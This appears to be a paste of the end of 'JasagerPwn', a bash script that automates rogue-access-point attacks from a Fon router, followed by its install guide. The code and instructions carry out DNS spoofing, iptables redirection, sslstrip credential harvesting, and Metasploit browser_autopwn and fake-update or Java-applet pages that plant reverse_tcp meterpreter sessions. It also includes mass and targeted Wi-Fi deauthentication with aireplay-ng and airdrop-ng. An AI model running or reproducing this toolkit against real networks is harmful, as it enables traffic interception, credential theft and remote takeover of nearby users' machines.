"JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!" break ;; M|m|Menu|menu|2) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; B|b|browserpwn|browserPwn|3) if [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $browserpwn -eq 0 ]; then if [ $autoMetScript -eq 1 ]; then metScript; fi xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" & #xterm -geometry 110x42+464-38 -bg black -fg green -T "[leg3nd-BrowserPwn] v$version - WebServer" -e "msfcli auxiliary/server/browser_autopwn LHOST=$ourIP SRVPORT=80 SRVHOST=$ourIP URIPATH=/ E" & sleep 25 echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." ipTableRedirect #iptables -t nat -A PREROUTING -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $ourIP:80..." browserpwn="1" fi while true do if [ $fakeupdate -eq 1 ]; then break; fi if [ $javaATK -eq 1 ]; then break; fi echo echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m" echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE2 #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2 case $USR_CHOICE2 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & browserpwn="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!" echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!" break ;; M|m|Menu|menu|2) echo -e "\e[01;33m[!]\e[00m Please kill Browser AutoPwn jobs in metasploit, or close it." break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; D|d|deauth|Deauth|DeAuth|5) attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` while true do echo echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m" echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth" echo -e "\e[01;33m[!]\e[00m [4][K]ill [5][M]ain menu" #read -r -p "[?] Please enter [ A | D | S | K | M ]: " USR_CHOICE3 echo -e -n "\e[01;33m[!]\e[00m Choose From Above: " read -e USR_CHOICE3 case $USR_CHOICE3 in A|a|airodrop|Airodrop|1) if [ -e "/usr/bin/airdrop-ng" ]; then if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi sleep 2 xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" & AIRDUMPID=`echo $!` sleep 10 xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" & AIRDROPID=`echo $!` else echo echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this." echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/airdrop-ng and run install.py." fi ;; D|d|deauth|DeAuth|2) #if [ ! $ATKcheck ]; then # xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" & # sleep 4 #fi xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" & DEAUTHPID=`echo $!` ;; S|s|single|Single|3) #if [ ! $ATKcheck ]; then # xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "#airmon-ng start $WIFACE" & # sleep 4 #fi xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" & xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" & airID=`echo $!` echo read -r -p "[?] Enter the target APs BSSID: " TBSSID kill $airID read -r -p "[?] Do You want a specific client? [ Y | N ]: " DMODE case $DMODE in y|Y|Yes|yes|1) xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" & echo read -r -p "[?] Enter the target Client MAC: " CMAC xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" & ;; n|N|No|no|2) xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" & ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac #take in information from dump for aireplay ;; K|k|kill|Kill|4) xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" & xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" & ;; M|m|menu|Menu|5) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; N|n|Network|network|net|6) while true do echo echo -e "\e[01;33m[MODE][==================-Network Settings-====================][!]\e[00m" echo -e "\e[01;33m[!]\e[00m [1][I]nterface [2][D]eAuth Config" echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain menu" echo -e -n "\e[01;33m[!]\e[00m Choose From Above: " read -e USR_CHOICE99 case $USR_CHOICE99 in I|i|interface|Interface|1) read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: " USR_CHOICE98 case $USR_CHOICE98 in #Connecting to WIFI y|Y|Yes|yes|1) xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" #kill $dnsID2 >/dev/null 2>&1 echo read -p "[!] Connect to WiFi Network THEN Press [Enter] .." echo echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE" read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE IFACE=`echo $NEWIFACE` if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then IPTABLES elif [ $sniffing -eq 1 ]; then ipTableRedirect elif [ $browserpwn -eq 1 ]; then ipTableRedirect elif [ $fakeupdate -eq 1 ]; then ipTableRedirect elif [ $javaATK -eq 1 ]; then ipTableRedirect fi while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 & sleep 2 && dnsID2=`echo $!` wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'` echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf ;; #Connecting to HARDWIRE n|N|No|no|2) #kill $dnsID2 >/dev/null 2>&1 xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" echo echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE" read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE IFACE=`echo $NEWIFACE` if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then IPTABLES elif [ $sniffing -eq 1 ]; then ipTableRedirect elif [ $browserpwn -eq 1 ]; then ipTableRedirect elif [ $fakeupdate -eq 1 ]; then ipTableRedirect elif [ $javaATK -eq 1 ]; then ipTableRedirect fi #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 & echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & sleep 2 && dnsID2=`echo $!` ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac ;; D|d|deauth|DeAuth|2) xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf" echo echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes." ;; R|r|refresh|Refresh|3) xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE" sleep 3 gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" & #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &> /dev/null & echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & sleep 2 && dnsID2=`echo $!` ;; M|m|menu|Menu|4) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; X|x|exit|Exit|7) cleanup ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done cleanup ####################################################################################### INSTALL_HOWTO: ================================ JasagerPwn Attack Vector Script -------------------------------- leg3nd @ info-s3curity.com -------------------------------- Bugs @ hak5 forums or via email dgriffin831@gmail.com -------------------------------- ================================ General Description: This is a fairly basic bash script used to automate multiple attack vectors using Jasager/Karma on a Fon router. The script is designed to be error coded and seamless in terms of switching access and attacks at will. I have found it to be extremely useful in pentest scenarios becuase of all the time saved doing basic setup for attacks manually. Enjoy at your own risk! -This script is going to assume your using backtrack 4 with /pentest/, if you have it somewhere else just adjust it accordingly. The following dependencies are required for full functionality of the script... Dependencies: PHP5, Apache2, Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection. Step 1: Insure you have everything needed. ------------------------------------------ apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 twisted-web libapache2-mod-php5 cd /pentest/exploits/SET/ && python install.py cd /pentest/wireless/airdrop-ng/ && python install.py - Make sure SSLstrip is installed with the same method, I think it is by default in bt4. If it isnt working this is how to install it: cd /pentest/ wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz tar xvf sslstrip-0.7.tar.gz cd sslstrip-0.7/ chmod +x setup.py python setup.py Step 2: Adjust the script variables. ------------------------------------ - Open up the script in your favorite editor and look over all the variables and their comments. - If your not using bt4 you may need to adjust the SET and MSF diretories. - Set up the correct interfaces according to your setup. - Set the 'fonIP' variable to an available IP on the FONs subnet. - I recommend setting up the 'metScript' function to automaticlly do what you need on your victims, by default this set to "0" and uses reverse_tcp_dns backdoors. Step 3: Setup FON ------------------ - We need to remove DHCP on the fon becuase we will be running it from the computer instead. - If your using some other DHCP service you may also need to disable that. /etc/init.d/dnsmasq stop /etc/init.d/dnsmasq disable Thats it! If everything is done correctly and assuming the system has the correct versions of python and ruby, you should be good to go. ======================= Included Attacks ======================= SSLstrip/Sniffing: By default it will always be using dsniff, driftnet, and urlsnarf becuase its seemless to the users anyways. The attack SSLstrip/sniffing will start stealing SSL certs from https:// websites as they browse, it works on around 95% of SSL websites, These logs will be followed, saved, and parsed for login credentials. SSLstrip is set to use port 10000 and will be paused when using other attacks. FakeUpdate(by g0tmi1k): Redirect WLAN to fake microsoft update page hosted in apache with a generated payload with meterpreter reverse_tcp. This currently only has download support for MS clients. BrowserPwn: This will redirect WLAN to a metasploit browser_autopwn server, This is fairly nosiy and will throw out any exploit thats availble for that browser to gain a reverse_tcp meterpreter session. This works on any OS. JavaPwn: This will redirect WLAN to a SET generated java page with a reverse_tcp meterpreter java applet, It asks to 'run' the Applet while on a cloned/modified version of the Java download page. Cloned pages include google and a fake Sun Java page. Keep in mind that cloned pages need to have images,scripts, and css hosted LOCALLY to work. -This attack vector is included with 2 templates in the script (google and a java required page). -KEEP IN MIND - When combining the "clone website" feature of SET with these IPtables command, the template will be obscured becuase images cannot be pulled from the remote server. I manually edited the sites to work. DeAuth: There are a few different de-authorization attacks included in the script. -The most effective being airdrop-ng, this is a client and rule based mass deauth tool, It is set to deauth every AP around you expect your AP and your wireless card (so you can tunnel via wireless). -I normally keep a terminal open in /tmp (where i create the config files in the start of the script), and you may manually edit the deauth configurations as needed. It will not reset until the whole script restarts. -"Mass DeAuth" is a rather simple bash script which uses iwscan to gather APs informations and sends out deauth packets via 'aireplay-ng -0', but this is sent to the AP (broadcast) itself, and not client based. -Single DeAuth is just a normal deauth attack, This is if you wanted to be a little stealthy and pick up specific clients.

Title:

Privacy: Public Private

How long should your post be retained?

15 mins an hour a day a week a month forever